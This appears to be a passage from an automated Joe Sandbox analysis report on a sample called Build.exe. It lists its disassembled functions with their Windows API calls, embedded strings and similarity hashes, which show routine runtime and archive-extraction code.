Opcode ID: bc4b718e69716b44d63f1d39a8e7b157c179685171ab601a4d05ed8642468470
Instruction ID: ef49d064af217a74f0c0e370b27f5742225d29b52b4894dd79e2538442d15349
Opcode Fuzzy Hash: bc4b718e69716b44d63f1d39a8e7b157c179685171ab601a4d05ed8642468470
Instruction Fuzzy Hash: 4C5128F5248300FAF6217F948D42F3676A4AB0DF06F20A51BB386640E1C7AD9741AB5F

Function 0044A7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe,00000104), ref: 0044A800
_free.LIBCMT ref: 0044A8CB
_free.LIBCMT ref: 0044A8D5

Strings

C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe, xrefs: 0044A7F7, 0044A7FE, 0044A82D, 0044A865

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe
API String ID: 2506810119-1922435914
Opcode ID: 6c3b3b9ec7f4069c28875108d27c28b670b954eb86b807e2ef8784fb70fa03da
Instruction ID: 4f2567f8e0c847bd3429e74064b25a5c6ff397927c629c05547c757129cf2ffc
Opcode Fuzzy Hash: 6c3b3b9ec7f4069c28875108d27c28b670b954eb86b807e2ef8784fb70fa03da
Instruction Fuzzy Hash: 67319671940204EFFB11EF95D88599FBBFCEB85314B11406BF50497201D6788E51CB9A

Function 004457F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0044581B
_abort.LIBCMT ref: 00445926

Strings

MOC, xrefs: 0044582D
RCC, xrefs: 00445835

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 380a61d815951972b39e62fab9028671c152a3249a276e969d2dab1fa548733c
Instruction ID: e2bfb850d04939faf27d66507d60b86d27b1539e839d0055576b0a6916caa7b3
Opcode Fuzzy Hash: 380a61d815951972b39e62fab9028671c152a3249a276e969d2dab1fa548733c
Instruction Fuzzy Hash: 58418971900609EFEF15DF98CD81AEEBBB5FF48314F18845AF904A7212D3399960DB58

Function 0042F7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042F82D
_strncpy.LIBCMT ref: 0042F871

Part of subcall function 00433F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0042F801,00000000,00000000,?,00465070,?,0042F801,?,?,00000050,?), ref: 00433F64

Strings

$%s, xrefs: 0042F822
@%s, xrefs: 0042F817

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: d80b849193d6342fe6d843bb9673fb35bb83341bd782b4fbff49fd5c3dabd7a0
Instruction ID: df0b3f424dd6b41b75874a5d61d75d09589ec8947892919d52bcdde787d6680a
Opcode Fuzzy Hash: d80b849193d6342fe6d843bb9673fb35bb83341bd782b4fbff49fd5c3dabd7a0
Instruction Fuzzy Hash: 8721B772600718ABEB11EF65DC01FAF77B8BB04300F94053BF91193191E779E9098B59

Function 0043CDA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00421366: GetDlgItem.USER32(00000000,00003021), ref: 004213AA
Part of subcall function 00421366: SetWindowTextW.USER32(00000000,004565F4), ref: 004213C0

EndDialog.USER32(?,00000001), ref: 0043CE28
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0043CE3D
SetDlgItemTextW.USER32(?,00000066,?), ref: 0043CE52

Strings

ASKNEXTVOL, xrefs: 0043CDB8

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 732293ada8ebbd4cff49c5e234c5e05884b02fc60035782e4e69e66bd1fe5dd0
Instruction ID: f8d1616b9e2d9a6a40a4ba243f9bc04400a73da16969949ba30e454dbcde9614
Opcode Fuzzy Hash: 732293ada8ebbd4cff49c5e234c5e05884b02fc60035782e4e69e66bd1fe5dd0
Instruction Fuzzy Hash: 4011EC32340214BFD2119F68DC86F6B3B69FB4EB40F50041AF641B71A4C7659901DB6D

Function 00432F22 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0042CAA0,00000008,00000004,0042F1F0,?,00000000), ref: 00432F61
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0042CAA0,00000008,00000004,0042F1F0,?,00000000), ref: 00432F6B
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0042CAA0,00000008,00000004,0042F1F0,?,00000000), ref: 00432F7B

Strings

Thread pool initialization failed., xrefs: 00432F93

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 799286c2d1bf6677884583b18415756c7b9e7fe3444b48948ced8e2830d212b4
Instruction ID: 6ff69dd018252efb36baf5f20b89807afc4f8a3e55ffe60a333059eda62feabf
Opcode Fuzzy Hash: 799286c2d1bf6677884583b18415756c7b9e7fe3444b48948ced8e2830d212b4
Instruction Fuzzy Hash: 6111E7B1604708AFC3219F669C84997FBECFB58758F60483FF1DAC3200D6B599408B58

Function 004400EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0044012E, 00440162
RENAMEDLG, xrefs: 00440143

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 64009e9bfcef211a2d5193b7e292d7f4050a8e456f23da2c3756542ff0dbebc9
Instruction ID: 8ebca3110da93f358e9ddd8d898d190c97d904f7aa05697ac1754b361f4d3ea5
Opcode Fuzzy Hash: 64009e9bfcef211a2d5193b7e292d7f4050a8e456f23da2c3756542ff0dbebc9
Instruction Fuzzy Hash: C901B571604144AFE7119F24EC44B777FA4EB09740F10043BFA45A3270D7B68860DBAD

Function 00424B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00424B42

Part of subcall function 0044106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00441079
Part of subcall function 0044106D: ___delayLoadHelper2@8.DELAYIMP ref: 0044109F

std::_Xinvalid_argument.LIBCPMT ref: 00424B4D

Strings

vector too long, xrefs: 00424B48
string too long, xrefs: 00424B3D

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 2355824318-1617939282
Opcode ID: 79d71b1c1e9f8fc1ed94224964588717e41f6d2ecdb0b79769d581bc2e7a67d5
Instruction ID: 72b9c77fc3b23bb494d8725ccecf04c7db689dabf288c5a0dcdc7e246de1f4a2
Opcode Fuzzy Hash: 79d71b1c1e9f8fc1ed94224964588717e41f6d2ecdb0b79769d581bc2e7a67d5
Instruction Fuzzy Hash: A3F08231300354AB56346E99EC4594AB7A9EBC4B25750051BE94593602C3B4F9448BBD

Function 0042C142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00429343,?,?,?), ref: 0042C1EE
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00429343,?,?), ref: 0042C22C
SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00429343,?,?,?,?,?,?,?,?), ref: 0042C2AF
CloseHandle.KERNEL32(00000800,?,?,?,00429343,?,?,?,?,?,?,?,?,?,?), ref: 0042C2B6

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 00e91c513020a1e30724b4f02a3920e90ddb35d65aeebfd03cc2a5e8e4dd36e8
Instruction ID: 36593035eec034ba682cc1f282ad46b639d6a9f73544c7dce065b32ff450ac00
Opcode Fuzzy Hash: 00e91c513020a1e30724b4f02a3920e90ddb35d65aeebfd03cc2a5e8e4dd36e8
Instruction Fuzzy Hash: 7941D7306483519EE320DF64EC81FAFB7D8AF89704F44091EB5D1D72C1DA68DA48CB56

Function 0042BD61 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0042BD93
_wcslen.LIBCMT ref: 0042BDB6
_wcslen.LIBCMT ref: 0042BE4C
_wcslen.LIBCMT ref: 0042BEB1

Part of subcall function 0042C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,004287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0042C3A5

Part of subcall function 0042BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0042BC1C
Part of subcall function 0042BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0042BC48

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen$DirectoryRemove$CloseFind
String ID:
API String ID: 973666142-0
Opcode ID: 71679eb75e5f4ba7bb6f6a161d45ab957afecafd139f37fa1746d145ac2e6a6e
Instruction ID: da4306ccc1e9e22fe0439947acf3503b89a110833c05461be985460934baaff6
Opcode Fuzzy Hash: 71679eb75e5f4ba7bb6f6a161d45ab957afecafd139f37fa1746d145ac2e6a6e
Instruction Fuzzy Hash: C2410C727043A056CB30EB65A8459FBB3E9DF85304F85481FEA8593241DB7C9D84C7DA

Function 0042849E Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000800,?,?,D72E4020,00000000,?,00000000), ref: 00428596

Part of subcall function 00428C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00428CB2
Part of subcall function 00428C95: GetLastError.KERNEL32 ref: 00428CF6
Part of subcall function 00428C95: CloseHandle.KERNEL32(?), ref: 00428D05

Strings

SeSecurityPrivilege, xrefs: 0042851C
SeRestorePrivilege, xrefs: 00428531
TD, xrefs: 00428557, 0042857A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege$TD
API String ID: 1245819386-2902214557
Opcode ID: 75c8ba619f4b80a7c245134abba95bd5b2a55a5305559320400f445b45174e79
Instruction ID: e83711bc2605bd6db0238a734376a378982dadbe9184852b07be2f90ec55be97
Opcode Fuzzy Hash: 75c8ba619f4b80a7c245134abba95bd5b2a55a5305559320400f445b45174e79
Instruction Fuzzy Hash: DE41B671B04254AADB20DF54AC01BFE77A8EB49304F44006FF905A7281DBB85D448B6D

Function 0043C5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0043C5F6
GetDeviceCaps.GDI32(00000000,00000058), ref: 0043C605
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043C613
ReleaseDC.USER32(00000000,00000000), ref: 0043C621

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 1703375df54e17f99d6fba6153ec3fb7e6c8c866e9ff81510369af8d9a4016b5
Instruction ID: 4c6b8849f355aab476636c4ec2b6101e995a39f217ab4807af30eb09bcba260e
Opcode Fuzzy Hash: 1703375df54e17f99d6fba6153ec3fb7e6c8c866e9ff81510369af8d9a4016b5
Instruction Fuzzy Hash: 19E0E63158976057D3116B606C6DFAB3B54EB1A713F140429F601A6290DA7484008FD9

Function 0044D808 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D974

Part of subcall function 00446676: IsProcessorFeaturePresent.KERNEL32(00000017,00446648,00000000,0044B5F4,00000000,00000000,00000000,00000016,?,?,00446655,00000000,00000000,00000000,00000000,00000000), ref: 00446678
Part of subcall function 00446676: GetCurrentProcess.KERNEL32(C0000417,0044B5F4,00000000,?,00000003,0044BA28), ref: 0044669A
Part of subcall function 00446676: TerminateProcess.KERNEL32(00000000,?,00000003,0044BA28), ref: 004466A1

Strings

., xrefs: 0044DB2B
*?, xrefs: 0044D84B

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
Instruction ID: 283c198b1c7ac732833d9d97fc803020c3438f8c0a08b0dcfde221c93b54f9b7
Opcode Fuzzy Hash: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
Instruction Fuzzy Hash: 7051AF75E00209EFEF14DFA9C881AAEFBB5EF49314F25416EE854E7301E6399A018B54

Function 0043D76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0043D7D1
_wcslen.LIBCMT ref: 0043D7EC

Strings

}, xrefs: 0043D7C4

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: eb0bb378f00cbb0f5987b0858ab64c86a0799c5f66bf8d6fb5142235653122ca
Instruction ID: b7c1fa38db6c29fee2555fad373ab8e321b7f42f0ccd7b4dec7651ac1682c4f8
Opcode Fuzzy Hash: eb0bb378f00cbb0f5987b0858ab64c86a0799c5f66bf8d6fb5142235653122ca
Instruction Fuzzy Hash: 3421B032A043456AE735FB65E845A6BB3E8EF88714F50042FF540C3241EA78E84883EB

Function 0043CEBF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0043D392: GetCurrentProcess.KERNEL32(00020008,?), ref: 0043D3A1
Part of subcall function 0043D392: GetLastError.KERNEL32 ref: 0043D3CC

CreateDirectoryW.KERNEL32(?,?), ref: 0043CF61
LocalFree.KERNEL32(?), ref: 0043CF6F

Strings

D, xrefs: 0043CF20

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID: D
API String ID: 1077098981-1145219676
Opcode ID: 57288255d3db6f1c9f3485d99ee91ba405ed7349145b6c2e541c099965e2c704
Instruction ID: a6c98ebeaf2ce556b67a10c1c401a5ce9ff9bea8ca4f5778ee5fdc8d4f307e85
Opcode Fuzzy Hash: 57288255d3db6f1c9f3485d99ee91ba405ed7349145b6c2e541c099965e2c704
Instruction Fuzzy Hash: EE21F2B1900209ABDB10DFA5D9849EFBBFCFB49345F50812AB811E3250E738DA15CBA5

Function 0042D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0042D8D3

Part of subcall function 00424C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00424C13

Strings

%c:\, xrefs: 0042D8C9

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 070fcc7515d5a7c67828a65a859f9b2887e6cba8e51e38465ec569cfc9ba7477
Instruction ID: 88824e2fe1f64beebcbee10f8cc02bc293ee5dbc1478b126f8d2c40908698aca
Opcode Fuzzy Hash: 070fcc7515d5a7c67828a65a859f9b2887e6cba8e51e38465ec569cfc9ba7477
Instruction Fuzzy Hash: 3801F9A3A04321759B206B76BC46D6BA7ACDED5360790441FF485C6192EA28D890C2A9

Function 004410F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0044130A
___raise_securityfailure.LIBCMT ref: 004413F2

Strings

8]H, xrefs: 004413ED

Memory Dump Source

